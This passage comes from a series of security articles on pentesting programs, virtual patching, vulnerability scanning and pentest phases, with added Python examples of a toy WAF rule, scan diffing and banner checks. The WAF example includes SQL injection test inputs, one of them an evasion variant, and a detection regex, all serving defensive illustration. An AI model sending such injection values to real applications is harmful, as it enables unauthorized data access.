  • Lateral movement
  • Data exfiltration
  • Application vulnerabilities
  • Input validation
  • Authentication
  • Authorization enforcement
  • Vendor trust and supply chain security

7. Define the type and number of tests, and schedule them

As a company expands into the digital world, its data, systems, networks, and digital assets will evolve. Penetration tests can only provide a view of a company’s IT infrastructure at a specific moment.

However, when designing a penetration testing program, companies can schedule yearly, quarterly, or monthly penetration tests to protect their systems over time as they change. Additionally, it’s important to know how penetration tests work, including their phases and types, to understand which ones to run, while always focusing on identified asset priorities.

Also read: Penetration Testing Phases & Steps Explained

8. Establish communication channels and awareness

It’s critical to establish clear communication channels. Penetration testing should not be siloed and limited to IT and security teams. Executives, data engineers, developers, content creators, marketing and sales, production, and distribution teams should all be aware of the program.

Penetration tests are all about learning about errors, misconfigurations, and weaknesses. Therefore, every worker may have a role to play in improving security. Feedback is always encouraged to create a strong security culture.

9. Choose penetration testers, and run the tests

Penetration tests can be run in-house, through a vendor, through bug bounty programs, or through organizations that offer penetration tests as a service.

Each method has its pros and cons. While in-house tests allow for complete control, a team of experts is needed to execute them. On the other hand, outsourcing penetration tests can be expensive, depending on the vendor or program, but organizations can also increase the diversity of talent and resources with this option. In the end, it comes down to an organization’s resources, the importance of its data, and the level of confidence in security controls.

10. Reporting, remediation, monitoring, and restarting

A penetration testing program does not end when tests conclude. Each test should reveal vulnerabilities and recommend patches and remediations. Fixing vulnerabilities is the most direct goal of penetration testing.

Reporting, remediation, monitoring, and retesting take time and are essential; otherwise, you are just identifying weaknesses but not fixing them or checking to see if patches and mitigations were applied. This stage is critical to improving an organization’s learning and performance curves at all levels.

It’s also essential to revise and adjust the program after every test and after the entire scheduled series of tests is completed. Simply put, step 10 is not the end; it is followed by a restart and step one.

See the Best Patch Management Software & Tools

Teams to Involve in the Pentesting Program

No penetration testing program will be successful if it only includes security teams and IT departments. An organization’s digital attack surface extends to every aspect of its operations.

Boards and leaders need to know about security to make informed business decisions, developers need to learn from errors, and even the human element of security will be involved in simulated phishing attacks during penetration tests. Therefore, everyone should have some role in the program, depending on their contribution.

It’s also important to understand that some penetration tests may simulate attacks but never disclose to the company what they will be attacking or when. These blind attacks try to get as close as they can to real-world scenarios to test security teams’ response performance and time — something closer to red-and-blue teaming.

Hackers will also run attacks attempting to steal credentials from workers as cyber criminals do. If workers are informed about these simulations, the results of the tests will not be realistic.

Engineers and product teams need to be mainly involved in the program’s reporting, remediation, and monitoring phases. Just like security teams, they will learn from simulations and improve their work.

Executives can better understand the risks, consequences, and state of their security with penetration tests. This helps create a top-to-bottom security culture and common understanding that facilitates daily cybersecurity operations.

Bottom Line: Starting a Pentesting Program

Even if you choose to outsource your pentesting program, you should still take the time to develop a pentesting program. It will make your security team and business managers better informed, and will also guide discussions with vendors and service providers. 

A penetration testing program goes beyond identifying weaknesses before criminals can detect them and use them against you. It provides a vision of the organization’s performance, security, awareness, and culture and can help you achieve business targets and goals. You need to know what’s critical before you can figure out how to protect it.

Read next: What is Cyber Threat Hunting? Definition, Techniques & Steps

What is Virtual Patching and How Does It Work? (https://www.esecurityplanet.com/applications/virtual-patching/, Tue, 14 Feb 2023 16:31:43 +0000)

Virtual patching uses policies, rules and security tools to block access to a vulnerability until it can be patched.

Zero-day threats and legacy systems are two sources of vulnerabilities for which no patch may exist for some time, if ever. In those cases, security teams can block a potential attack path until a permanent fix can be found.

Cyber criminals rush to exploit vulnerabilities, bugs, errors, misconfigurations, and unchecked code before patches become available and security teams are able to test and deploy them. Security teams must therefore respond with equal speed and close off potential attack paths to those vulnerabilities until they can be patched. Those defensive steps are referred to as virtual patching. We’ll focus here on how security teams deploy those defenses.

How Virtual Patching Works

Also known as external patching or just-in-time patching, the term virtual patching was coined by intrusion prevention system (IPS) vendors several years ago. Virtual patching bypasses the complex and time-consuming process of developing and deploying patches by using rules, mitigations and protective steps, often at the IPS or firewall level, to shore up networks to prevent attackers or malware from accessing these vulnerabilities.

Virtual patches are similar to vendor patches in the sense that they protect against specific exploits. The main difference is that a virtual patch is deployed at the network level, typically using an IPS or firewall rule, instead of the device or asset that contains the vulnerability.

IPS solutions are built to monitor and inspect traffic while blocking malicious activities. Using virtual patches, IPS can identify and stop attempts targeting a specific vulnerability. This creates a layer of protection around the vulnerable asset instead of patching the asset itself. IPS signatures or virtual patches can be deployed at the network level using the intrusion prevention (IPS) functionality built into a next-generation firewall (NGFW), a web application firewall (WAF) or a traditional standalone IPS appliance.

Virtual patches must work to prioritize business-critical network traffic, be effective in their ability to shield a vulnerable asset, and be coded for rapid and correct deployment on different environments: mobile, cloud, hybrid, or web. Virtual patching must also be able to run deep packet inspection to shut down malicious packets and attempted attacks hiding in web and network traffic.

Also read: Is the Answer to Vulnerabilities Patch Management as a Service?

Virtual Patching Best Practices and Phases

Virtual patching requires several phases to be done correctly: preparation, identification, analysis, virtual patch creation, implementation and testing, and recovery and follow-up.

Preparation

Virtual patching should be part of a continuous offensive security approach. This means it should not react to vulnerability exploits but prevent them before they happen. The security groundwork is done in the preparation stage.

A critical step is ensuring you have all updates, patches, and vulnerability alerts set up. Additionally, to avoid authorization delays, virtual patches can be pre-authorized. Virtual patches do not affect the asset’s code itself, so exhaustive tests on the affected app are not needed. A virtual patch can also protect an asset while the real patch is being developed and tested.

“Categorizing virtual patches in the same group as Anti-Virus updates or Network IDS signatures helps to speed up the authorization process and minimize extended testing phases,” recommends the Open Web Application Security Project (OWASP).

Virtual patching tools must be deployed and operational. For tools like ModSecurity WAF for Apache servers (which works on non-Apache services as well) or OWASP’s ESAPI WAF, it’s best to have them installed and enabled. That way, when you need them they’re ready to go.

Identification

There are two methods for identifying vulnerabilities: proactive and reactive. Proactive identification approaches are recommended. In this method, organizations conduct penetration tests and vulnerability scanning and use other tools to identify weaknesses before attackers can exploit them. Reactive identification comes in late when the vulnerability is already disclosed by vendors, commercial application software developers, or a security incident.

Analysis

Once a vulnerability has been identified, it needs to be analyzed before the patch is deployed. Organizations need to ask themselves what the exposure is, where it is found, what systems it affects, and how it can be exploited. Analyzing whether the flaw affects business-critical assets is also crucial.

Next, security teams must determine whether the virtual patching tool can detect the flaw. Using the vulnerability information, the bug tracking system can also monitor and report on the incident. The vulnerability identifier (CVE name/number) must also be double-checked.

Additionally, an inventory of the software and systems impacted must be done, and configurations that trigger the problem must be listed. Vulnerability announcements also usually reveal the exploit code; this data can be used to develop and test virtual patches.

Virtual patch creation

The identification phase will help you determine the priority, risk, and time-to-fix parameters. Sometimes complete fixes cannot be applied due to high risks in real-time settings. Partial fixes can buy you enough time to develop more comprehensive patches. A virtual patch is about risk reduction, so be prepared to compromise if necessary.

There are two approaches to virtual patch development: positive (allow) and negative (block). A virtual patch should never block legitimate traffic or miss an attack, even when malware is coded to evade detection.

In positive (allow-list) manual virtual patches, rules model valid input, such as the permitted character set and length, and anything else is denied. In contrast, negative (block-list) patch rules detect specific attacks and block only those. Negative patches are easier and faster to code but can be more easily evaded. Positive patches, on the other hand, may not be feasible to deploy in time in large environments, since they are coded by hand.

Companies can also benefit from automated virtual patch creation tools that use the XML report created by automated vulnerability detection tools. These automated patches are created by auto-converting vulnerability data into virtual patches. Examples of automated virtual patch creation tools are OWASP ModSecurity Core Rule Set (CRS) Scripts, ThreadFix Virtual Patching, and Direct Importing to WAF Devices provided by many vendors.

Implementation and testing

There are different tools to implement virtual patches. These include web browsers, command-line web clients such as Curl and Wget, local proxy servers, and ModSecurity AuditViewer.

Regarding testing, if you used a vulnerability scanning tool or detected a flaw with a penetration test, you should rerun the scans and tests to check that the virtual patch is working. To ensure you are not blocking any normal traffic, you should initially set a log-only configuration when implementing virtual patches.
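To make the allow-list versus block-list distinction from the virtual patch creation phase and the log-only rollout advised above concrete, here is an added example in Python. It is not ModSecurity or OWASP code, just a toy rule evaluator: the `/account` endpoint, its `id` parameter, the `VirtualPatch` class and every sample request are hypothetical and constructed for the illustration. It applies a negative (block-list) rule in DetectionOnly mode and a positive (allow-list) rule in blocking mode to the same requests, and shows that a trivially rewritten attack string slips past the block-list pattern but not past the allow-list model:

```python
"""Minimal virtual-patch evaluator: an added illustration, not ModSecurity.

Models the two rule styles described above for a hypothetical
/account?id=<number> endpoint:
  * a negative (block-list) rule that matches a known attack pattern, and
  * a positive (allow-list) rule admitting only what the parameter may
    legitimately contain (digits, bounded length).
Each rule runs in "DetectionOnly" (log only) or "On" (block) mode, the
same two-stage rollout recommended for virtual patches. All requests and
rules below are constructed for this example.
"""
import re
from dataclasses import dataclass, field


@dataclass
class Request:
    path: str
    params: dict


@dataclass
class Verdict:
    blocked: bool = False
    log: list = field(default_factory=list)


class VirtualPatch:
    """One rule guarding one parameter of one path (hypothetical API)."""

    def __init__(self, path, param, *, mode="DetectionOnly",
                 allow=None, deny=None, max_len=None):
        # Exactly one model per rule: allow (positive) or deny (negative).
        if (allow is None) == (deny is None):
            raise ValueError("specify exactly one of allow or deny")
        self.path, self.param, self.mode = path, param, mode
        self.allow = re.compile(allow) if allow else None
        self.deny = re.compile(deny, re.IGNORECASE) if deny else None
        self.max_len = max_len

    def violation(self, req):
        """Return a reason string if the request breaks this rule, else None."""
        if req.path != self.path or self.param not in req.params:
            return None
        value = req.params[self.param]
        # Length check first: oversized input is rejected before any matching.
        if self.max_len is not None and len(value) > self.max_len:
            return f"{self.param} longer than {self.max_len}"
        if self.allow is not None and not self.allow.fullmatch(value):
            return f"{self.param} outside allow-list model"
        if self.deny is not None and self.deny.search(value):
            return f"{self.param} matches deny pattern"
        return None


def evaluate(req, patches):
    """Apply every patch; only rules in "On" mode can block."""
    verdict = Verdict()
    for p in patches:
        reason = p.violation(req)
        if reason is None:
            continue
        verdict.log.append(f"[{p.mode}] {req.path}: {reason}")
        if p.mode == "On":
            verdict.blocked = True
    return verdict


# Constructed rules. The negative rule is deployed log-only first, as the
# text advises; the positive rule has already been promoted to blocking.
NEGATIVE_RULE = VirtualPatch("/account", "id", mode="DetectionOnly",
                             deny=r"'\s*or\s+")
POSITIVE_RULE = VirtualPatch("/account", "id", mode="On",
                             allow=r"[0-9]+", max_len=10)

SAMPLES = {  # constructed sample requests
    "legit": Request("/account", {"id": "12345"}),
    "obvious": Request("/account", {"id": "1' OR 1=1"}),
    # Same string with comments in place of whitespace: slips past the
    # block-list pattern, but not past the allow-list model.
    "evasive": Request("/account", {"id": "1'/**/OR/**/1=1"}),
    "other_path": Request("/status", {"id": "1' OR 1=1"}),
}


def run(patches=(NEGATIVE_RULE, POSITIVE_RULE)):
    """Evaluate every sample; returns {name: (blocked, log_lines)}."""
    results = {}
    for name, req in SAMPLES.items():
        v = evaluate(req, patches)
        results[name] = (v.blocked, v.log)
    return results


if __name__ == "__main__":
    for name, (blocked, log) in run().items():
        print(name, "BLOCKED" if blocked else "allowed", log)
```

The same progression applies to a real WAF: deploy the rule log-only, confirm that legitimate traffic produces no log lines (the `legit` sample here), then switch the mode to blocking. Running `run((NEGATIVE_RULE,))` alone shows why the text calls negative patches easier to evade: the `evasive` request produces no log entry at all.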

Recovery and follow up

Virtual patching does not end with implementation and testing. Cyber criminals update attacks with evolving malware exploit versions. The virtual patch must be followed up and monitored. Organizations should also document the entire process in case they need to restart the cycle.

Virtual patch performance must also be controlled, making sure traffic is not being affected improperly. Additionally, virtual patches are often temporary fixes, so they must be checked to see if the original asset patch has been released and installed.

What Can Happen to Unpatched Vulnerabilities?

Cyber criminals are constantly searching for vulnerabilities to execute attacks. Zero-day attacks are becoming increasingly common and dangerous. Furthermore, ethical hackers working in bug bounty programs, such as HackerOne, also reveal vulnerabilities every day. All of these issues are exploited by attackers.

The consequences of not patching business-critical security flaws are severe. They range from massive sensitive data leaks, data theft, ransomware, fines, reputation and financial losses, to shutdown of operations due to compromised systems. Many top vendors offer virtual patching services. These can be effective for businesses that do not have the in-house resources to develop their own virtual patches.

Developers and technology companies will often release temporary patches or mitigation steps to plug vulnerabilities until official patches can be released, so security teams have some help in their virtual patching programs.


Pros and Cons of Virtual Patching

Undeniably, virtual patching is critical due to the rapid evolution of the threat landscape. However, virtual patching is designed to be a temporary fix. It does not patch the vulnerability itself but prevents traffic from accessing and exploiting it.

One of the most significant benefits of virtual patching is that it buys security teams and developers the necessary time it takes to create real patches. Virtual patches also accelerate testing and deployment by gathering information on the threat. Fixing and coding software or applications can be time-consuming endeavors, but creating a shield that prevents traffic flow by allow-or-block rules is much easier and can be done rapidly.

On the other hand, while virtual patching gives organizations time to reduce the risk of cyberattacks, virtual patches can be bypassed through evasion and deception techniques. Virtual patching also creates a long-term risk for organizations when they delay or choose not to move forward with more permanent security patches and solutions.

Regarding privacy and data compliance laws, virtual patching can help organizations better meet requirements, such as GDPR and PCI DSS.

Older legacy systems that have reached the end of vendor support and security updates can also benefit from virtual patching. Virtual patching best practices and a complete understanding of their benefits and limitations can help companies keep up to date with security in the new era of digital transformation, acceleration, and modernization.

Bottom Line: Virtual Patching

Hackers can exploit new vulnerabilities within days, while it can take weeks or months for vendors to develop and release an official patch. Virtual patching, then, is a creative way to fill that gap until an official fix is available — or in the case of a legacy system, in case one never becomes available. In a time of increasingly dangerous cyberattacks, that’s a skill every cybersecurity team needs.

Read next: Patch Management Best Practices & Steps

What is Vulnerability Scanning & How Does It Work? (https://www.esecurityplanet.com/networks/vulnerability-scanning-what-it-is-and-how-to-do-it-right/, Thu, 09 Feb 2023 00:57:00 +0000)

Vulnerability scanning is the process of scanning IT networks and systems to identify security vulnerabilities in hardware and software.

As enterprise IT environments have grown more complex, the ways hackers can attack them have grown too. The edge, cloud computing, Internet of Things (IoT) devices, and more have led to a much bigger attack surface and have required new vulnerability scanning approaches and tools.

Cybersecurity vendors and developers have responded to these growing challenges by evolving vulnerability scanning tools and integrating these solutions as part of an integral, holistic vulnerability management framework.

Intruder — this article’s sponsor — is one such tool, an easy-to-use enterprise-grade vulnerability scanner that performs over 10,000 security checks, including perimeter scanning, internal scanning, cloud resource scanning, and web application vulnerability scanning.


See the Best Vulnerability Scanning Tools

How Does Vulnerability Scanning Work?

Vulnerability scanning tools, or vulnerability scanners, do much of the work by scanning IT systems and networks to identify vulnerabilities in devices and software and flag those that need attention.

But that’s just one step in the process. There are six phases in the vulnerability assessment and management process, and they all work together to ensure optimal security.

Phase one: Asset inventory

The first phase of vulnerability management is to create a comprehensive asset inventory across the entire organization. Because a vulnerability scan will only reveal a particular moment of your operations frozen in time, security programs and vulnerability scanning tools must be scheduled to run automated, periodic scans.

Also read: Top IT Asset Management (ITAM) Tools for Security

Phase two: Setting priorities

The next step is critical for vulnerability scanning tools to be effective: assets must be prioritized by how business-critical they are. This means that, by now, you must know what to scan, when to scan it, and which assets in the scan are most important. This phase streamlines security decision-making and helps teams respond with precision without wasting time and resources.

Phase three: Assessment

The third phase of the vulnerability management program is assessment. This is where security tools come into play. Once vulnerability scanning solutions are configured with the “where, when, and what’s a priority,” the scans are executed. This allows you to determine which risks to eliminate first based on various factors, including their criticality and vulnerability threat levels, as well as classification.

Vulnerability scans use the asset or data inventory and scan the attack surface in search of flaws, coding bugs and errors, anomalies, and default or incorrect configurations. Then, they identify potential paths attackers can exploit.

Phase four: Reporting

The vulnerability scanning and assessment cycle is completed with the reporting phase, in which vulnerability scanning and other security tools issue reports. Findings are used to get a clear idea of the risks, factors, and threat levels.

Phase five: Remediation

During this phase, the reports are used to patch flaws. Some vulnerabilities, like outdated software or outdated operating systems, can be easily solved with updates. Other fixes require advanced technical knowledge.

For example, cross-site scripting attacks, SQL injection vulnerabilities, and unencrypted channels require an experienced professional. Professional vulnerability scanning vendors usually offer a final report with all weaknesses discovered and pair each flaw with a recommended action.

Phase six: Verification and monitoring

The vulnerability scanning process ends with a final phase and then a restart of the entire cycle. The final phase sets new schedules for vulnerability scanning to verify that flaws have been corrected and to keep monitoring the networks and systems.
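One concrete way to perform the verification step, as an added example written for this article rather than any scanner vendor's code: diff the findings of the pre-remediation scan against the verification scan to separate what was fixed, what persists (including findings whose severity was raised between runs), and what is new. Scanner exports are modelled as plain dicts; the hosts, ports, `PLACEHOLDER-000n` vulnerability ids and severity values are constructed, and the 7-day rescan interval for open critical or high findings is this example's own assumption:

```python
"""Verify remediation by diffing two scan exports (added example, not
vendor code). Scanner output is modelled as plain dicts because export
formats differ; the field names host/port/vuln_id/severity are this
example's own normalisation. All findings are constructed.
"""

SEVERITY_RANK = {"critical": 4, "high": 3, "medium": 2, "low": 1, "info": 0}


def finding_key(f):
    """A finding's identity: host, port and vulnerability id. Severity is
    left out on purpose so that a rescore cannot disguise an open flaw."""
    return (f["host"], f["port"], f["vuln_id"])


def verify(before, after):
    """Compare the pre-remediation scan with the verification scan."""
    b = {finding_key(f): f for f in before}
    a = {finding_key(f): f for f in after}
    fixed = sorted(b.keys() - a.keys())
    new = sorted(a.keys() - b.keys())
    persistent = sorted(a.keys() & b.keys())
    # Persistent findings whose severity rose between scans (for example
    # after a rescore) deserve a second look even though they are not new.
    escalated = [k for k in persistent
                 if SEVERITY_RANK[a[k]["severity"]] > SEVERITY_RANK[b[k]["severity"]]]
    rate = len(fixed) / len(b) if b else 1.0
    return {"fixed": fixed, "new": new, "persistent": persistent,
            "escalated": escalated, "remediation_rate": rate}


def open_by_priority(after):
    """Order still-open findings for the next remediation round."""
    return sorted(after, key=lambda f: (-SEVERITY_RANK[f["severity"]], f["host"], f["port"]))


def next_scan_in_days(after, urgent=("critical", "high")):
    """Assumption made for this example: any open critical or high finding
    pulls the next verification scan forward to 7 days; otherwise keep a
    quarterly (90-day) cadence."""
    return 7 if any(f["severity"] in urgent for f in after) else 90


BEFORE = [  # constructed: findings from the scan before the patch window
    {"host": "web01", "port": 443, "vuln_id": "PLACEHOLDER-0001", "severity": "critical"},
    {"host": "web01", "port": 22, "vuln_id": "PLACEHOLDER-0002", "severity": "medium"},
    {"host": "db01", "port": 3306, "vuln_id": "PLACEHOLDER-0003", "severity": "high"},
    {"host": "db01", "port": 3306, "vuln_id": "PLACEHOLDER-0004", "severity": "low"},
]
AFTER = [  # constructed: verification scan after patching
    {"host": "web01", "port": 22, "vuln_id": "PLACEHOLDER-0002", "severity": "medium"},
    {"host": "db01", "port": 3306, "vuln_id": "PLACEHOLDER-0003", "severity": "critical"},
    {"host": "web01", "port": 8080, "vuln_id": "PLACEHOLDER-0005", "severity": "high"},
]


if __name__ == "__main__":
    report = verify(BEFORE, AFTER)
    for label in ("fixed", "new", "persistent", "escalated"):
        print(f"{label}: {report[label]}")
    print(f"remediation rate: {report['remediation_rate']:.0%}")
    print("next scan in", next_scan_in_days(AFTER), "days")
```

Keying findings on host, port and vulnerability id, and not on severity, is deliberate: a scanner rescoring a finding between runs would otherwise make an open flaw look fixed and reappear as a new one. The 90-day default matches the quarterly scanning interval the article recommends for continuous scans.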


Vulnerability Scanning vs. Penetration Testing

The main difference between vulnerability scanning and penetration testing is that the first is fully automated, while the second includes the manual work of a penetration tester that will exhaustively try to exploit weaknesses in systems. Penetration testers simulate attacks; they try to get in the mindset of a cyber criminal and use their techniques to find weaknesses and report the consequences that such a breach could have.

While intrusive vulnerability scanning can also exploit vulnerabilities, it does so automatically. The real purpose of a vulnerability scan is to give security teams a big picture look at critical assets, system and network flaws and security.

Despite their differences, both vulnerability scans and penetration tests are part of the wider vulnerability management framework or process. They are two different tools, each essential in their own way and critical for chief information security officers (CISOs) to keep their infrastructure safe.

While pentesting is part of a broader vulnerability management program, the two have one other essential difference: Vulnerability management is looking at IT and business systems as a whole, while pentesters are typically trying to breach an organization from outside the network (see Penetration Testing vs. Vulnerability Testing: An Important Difference).

Why Is Vulnerability Scanning Necessary?

Just as security teams run vulnerability scanning tools, cyber criminals do the same. They are constantly searching for flaws and weak entry points into a system. Additionally, a vulnerability scan reveals only your network and systems at a particular time. Therefore, scheduled and automated vulnerability scans are necessary to understand the security posture of the system and its flaws throughout different periods.

Vulnerability scanning also allows companies to take a proactive offensive approach to defensive security. They seek to stay one step ahead of cyberattacks and to maintain strong systems. Scans will enable you to close gaps before they become incidents.

Given the high cost of cyberattacks, vulnerability scans act as a cost-effective way to stay proactive in protecting your network. The consequences of breaches can be devastating, from data exfiltration to leaks, ransomware extortion, legal suits, fines, loss of reputation, and even shutdown of operations. Along with other tools, vulnerability scans are essential to protect against these consequences.

Types of Vulnerability Scanning

Security teams can configure vulnerability scans to execute different tests. It’s important to note that while top vendors offer modern vulnerability scanning tools that can be tuned, other solutions are niche or outdated. It’s essential to understand each type of scan and what your organization needs to make sure you get the right solution.

Bug bounty programs

Bug bounty programs use a community-driven approach to vulnerability scanning. These programs incentivize freelance hackers to find bugs on public-facing systems by offering rewards. Bug bounty programs have become increasingly common and are used by top technology companies. In these programs, organizations can have their system continuously tested throughout their life cycle.

Internal scans

These scans are done from inside the network using techniques such as privilege escalation. Internal scans are especially useful for mapping workforce permissions and finding vulnerabilities that an insider, or an attacker who has already gained a foothold, could exploit.

Also read: Testing & Evaluating SIEM Systems: A Review of Rapid7 InsightIDR

External scans

These scan all internet-facing assets, including employee login pages, remote access ports, and company websites. They help organizations understand their online weaknesses and how those weaknesses could be used to gain access to their network.

App-based scans

These scans are used when companies need to understand the flaws of specific endpoints — for example, a web-facing server, IoT devices or wireless networks. The assets scanned are usually those tied to the company’s critical operations, so that attacks capable of causing downtime can be prevented.

Continuous scans

These are automated scheduled scans that usually run every quarter. Industry experts recommend that vulnerability scans be run at least once every three months. These scans can be configured as comprehensive or limited, external or internal, or other types.

Breach and attack simulation (BAS) tools offer a more automated approach to vulnerability scanning and penetration testing.

Intrusive and non-intrusive scans

Non-intrusive scans do not attempt to exploit vulnerabilities; their report is based on the inferred likelihood that a discovered flaw could be exploited (for example, from the version a service announces). Intrusive scans, on the other hand, will attempt to exploit vulnerabilities they discover. An intrusive scan makes the stakes clearer but could also disrupt operations.

Limited or comprehensive scans

Vulnerability scans can be limited to a certain set of devices, systems, and networks or be comprehensive and include all components.

Authenticated and unauthenticated scans

Vulnerability tools can run unauthenticated scans where only the open services available on the network are evaluated. On the other hand, authenticated scans access resources and assets that can only be scanned with privileged access and thus test higher-value targets.
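As an added illustration of the non-intrusive, unauthenticated style of check described above (this is example code written for this article, not a vendor’s scanner), the script below never sends an exploit: it reads the version a service announces in its banner, compares it with a table of fixed versions, and ranks the findings by severity. The banners, hosts and the advisory table are constructed for the demo; the “fixed” versions and notes are placeholders, not real advisories.

```python
"""Non-intrusive version inference over constructed service banners.

Added example (not from the article): a non-intrusive scan never sends an
exploit; it infers exposure by comparing the version a service announces with
a table of fixed versions. The banners and the advisory table below are
constructed for the demo, not real advisories.
"""
import re
from dataclasses import dataclass

SEVERITY_ORDER = {"critical": 0, "high": 1, "medium": 2, "low": 3}

# Constructed advisory table: (product, first fixed version, severity, note).
# A real scanner would load vendor advisories or a CVE feed here.
ADVISORIES = [
    ("OpenSSH", "8.0", "high", "placeholder: pre-8.0 builds flagged"),
    ("nginx", "1.22.0", "medium", "placeholder: pre-1.22 builds flagged"),
    ("ProFTPD", "1.3.8", "critical", "placeholder: pre-1.3.8 builds flagged"),
]


@dataclass
class Finding:
    host: str
    port: int
    product: str
    version: str
    severity: str
    note: str


def parse_version(text):
    """Turn '7.4p1' or '1.18.0' into a comparable tuple of ints."""
    return tuple(int(p) for p in re.findall(r"\d+", text))


def parse_banner(banner):
    """Extract (product, version) from common banner shapes; None if unknown."""
    patterns = [
        r"SSH-2\.0-(OpenSSH)_([\d.]+\w*)",
        r"Server: (nginx)/([\d.]+)",
        r"220 (ProFTPD) ([\d.]+\w*)",
    ]
    for pat in patterns:
        m = re.search(pat, banner)
        if m:
            return m.group(1), m.group(2)
    return None


def assess(host, port, banner):
    """Return a Finding when the announced version predates the fixed one, else None."""
    parsed = parse_banner(banner)
    if parsed is None:
        return None
    product, version = parsed
    for adv_product, fixed, severity, note in ADVISORIES:
        if adv_product == product and parse_version(version) < parse_version(fixed):
            return Finding(host, port, product, version, severity, note)
    return None


def scan(observations):
    """observations: list of (host, port, banner). Returns findings sorted by severity."""
    findings = [f for f in (assess(*o) for o in observations) if f]
    return sorted(findings, key=lambda f: (SEVERITY_ORDER[f.severity], f.host, f.port))


# Constructed observations standing in for banner grabs.
SAMPLE = [
    ("10.0.0.5", 22, "SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u7"),
    ("10.0.0.5", 80, "HTTP/1.1 200 OK\r\nServer: nginx/1.24.0\r\n"),
    ("10.0.0.9", 21, "220 ProFTPD 1.3.5e Server ready."),
    ("10.0.0.9", 443, "HTTP/1.1 200 OK\r\nServer: nginx/1.18.0\r\n"),
    ("10.0.0.12", 8080, "HTTP/1.1 200 OK\r\nServer: Jetty(9.4)\r\n"),  # unknown: no finding
]

if __name__ == "__main__":
    for f in scan(SAMPLE):
        print(f"[{f.severity:>8}] {f.host}:{f.port} {f.product} {f.version} - {f.note}")
```

The caveat this shows is the one the section describes: a banner-based verdict is a probability, not proof. A backported patch can leave an old version string on a fixed service, and a service that hides its banner (the Jetty line above) produces no finding at all; an authenticated or intrusive scan is what turns these inferences into confirmed results.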

Complementary Security Measures

Vulnerability scanning is augmented by different tools within the vulnerability management program. These tools include asset discovery and inventory management solutions, which help IT teams keep track of all devices, software, servers, and more across the company’s digital environment.

Other tools like patch management solutions ensure that systems and apps are up to date with the latest security patches. These automatically check for updates and notify teams when an update is required or new updates become available. They can run on entire networks.

Misconfiguration is one of the most common vulnerabilities leveraged by hackers. Security configuration management (SCM) software ensures devices and their security settings are properly configured. Some SCM tools can scan devices and networks for vulnerabilities, track remediation actions, and generate reports on security policy compliance.

While vulnerability scans only provide a view of the system frozen in time, security information and event management (SIEM) software can provide real-time insight into security information and events by analyzing log data from a wide variety of sources. They are designed to let security teams know what’s happening across their IT infrastructure, including network traffic, devices trying to connect to internal systems, user activity, and more.

Penetration testing is another tool used in vulnerability management. By simulating attacks in realistic ways, testers can identify weak spots in systems that real-world attackers could exploit. Finally, threat protection software allows organizations to track, monitor, analyze, and prioritize potential threats by collecting data from various sources.

Vulnerability Scanning Software and Tools

There are many vendors offering different solutions for vulnerability scanning. However, most require IT professionals to configure them and make sure the scans are done correctly, and security professionals then need to interpret the reports these tools generate.

To meet the demands of digital transformation, many traditional vulnerability scanning tools have been updated to prioritize flaws by business criticality, to scan new surfaces like IoT devices, and to detect human-element weaknesses such as susceptibility to phishing and other employee-directed attacks.

Here are some of the top vulnerability scanners; see our lists of open source and commercial vulnerability scanners for more options.

Top vulnerability scanning tools

  • OpenVAS: Runs multiple scanning techniques, including internal and external scans. The platform has a dedicated community of testers and uses its own scripting language for multiplatform flexibility.
  • Tenable: Offers comprehensive vulnerability management solutions specializing in continuous monitoring, not just on single vulnerability scans. It also provides compliance reports, risk assessments, and threat monitoring.
  • Network Mapper: Also known as Nmap, this open-source scanner can identify protocol-level weaknesses, enumerate running services, and port-scan ranges of addresses.
  • Rapid7: Provides different tools for vulnerability management, including SIEM and vulnerability scans. The platform offers managed security services, product consultations, and certification programs.

Bottom Line: Vulnerability Scanning

Vulnerability scanning is a critical cybersecurity practice that every organization needs to be doing to limit potential entry points for hackers.

Vulnerability scanning tools have come a long way, adapting to the challenges of an increasingly dangerous security landscape. Today, vulnerability scans are configurable and can set priorities and give new insights relevant to the expanded digital attack surface. They’re an essential cornerstone of a vulnerability management program.

Read next: Vulnerability Management as a Service (VMaaS): Ultimate Guide

This updates an April 5, 2019 article by Paul Rubens

Penetration Testing Phases & Steps Explained

Published Sun, 23 Oct 2022 11:30:00 +0000 at https://www.esecurityplanet.com/networks/penetration-testing-phases/
Organizations use penetration testing to strengthen their security. During these tests, simulated attacks are executed to identify gaps and vulnerabilities in the IT environment.

But before hiring penetration testers or starting a pentesting program, any organization should be aware of the phases and steps involved in the process. These tests are critical for obtaining an integrated view of a system, understanding how possible security breaches can occur, getting into the mindset of cyber criminals, and patching flaws.

Penetration testing can use different techniques, tools, and methods. For example, testers might simulate an external attack, as in a black box pen test; an internal attack, as in a white box pen test; or an external attack that has internal credentials, called a gray box pen test, which mirrors credentials cyber criminals usually obtain through phishing. These variables require all sides to be fully informed for a penetration test to be successful in practice.

See the Best Penetration Testing Tools

What are the 7 Penetration Testing Phases?

Some organizations list five penetration phases while others list six or seven. Additionally, organizations may have different names for each phase, despite the processes of the phase being identical.

The discrepancy in the number of test phases comes from two stages, one before the test begins and one after it concludes, that some organizations leave out. While they are not technical parts of the test, they have proven vital for security. This guide includes all seven stages to give full visibility of the processes required for a penetration test.

The seven phases of penetration testing are:

  1. Pre-engagement
  2. Reconnaissance or Open Source Intelligence (OSINT) Gathering
  3. Scanning or Discovery
  4. Vulnerability Assessment: Gaining Access
  5. Exploitation: Maintaining access
  6. Post-Exploitation, Reporting, and Risk Analysis
  7. Remediation

1. Pre-engagement

Pre-engagement is a phase often left out. However, it is fundamental for penetration testers and organizations to be on the same page. Built In explains that it is a bad idea to hire a penetration tester and let them run wild on your network. The pre-engagement phase is where the scope, logistics, rules of engagement, and timeline of the entire pen test are set with clear goals, targets, and objectives.

If there is no understanding of what needs to be tested and what type of tests are required, the results of a penetration test will be incomplete or even irrelevant. Pre-engagement is where the test is planned; therefore, no organization nor pentester should start without going through this first step.

Additionally, to thoroughly test the system, actions are required from pentesters that would be illegal without explicit consent or authorization. This is why organizations should also set clear rules of engagement in contracts with testers. Contracts, signed during pre-engagement, should also list critical assets, the main goals of the test, and other precautions.

2. Reconnaissance or open-source intelligence (OSINT) gathering

EC-Council Cybersecurity Exchange explains that reconnaissance is where testers gather as much information about the system as possible. But it’s not just about collecting random data. The goal is to gather data relevant to the tests that will be executed. This is why the first stage is critical. Planning the penetration test allows the tester to be more precise when determining what type of data they gather to plan an effective attack strategy.

Reconnaissance can be active, when the tester engages directly with the target system, or passive, where publicly available information is obtained. Usually, comprehensive testers use both methods.

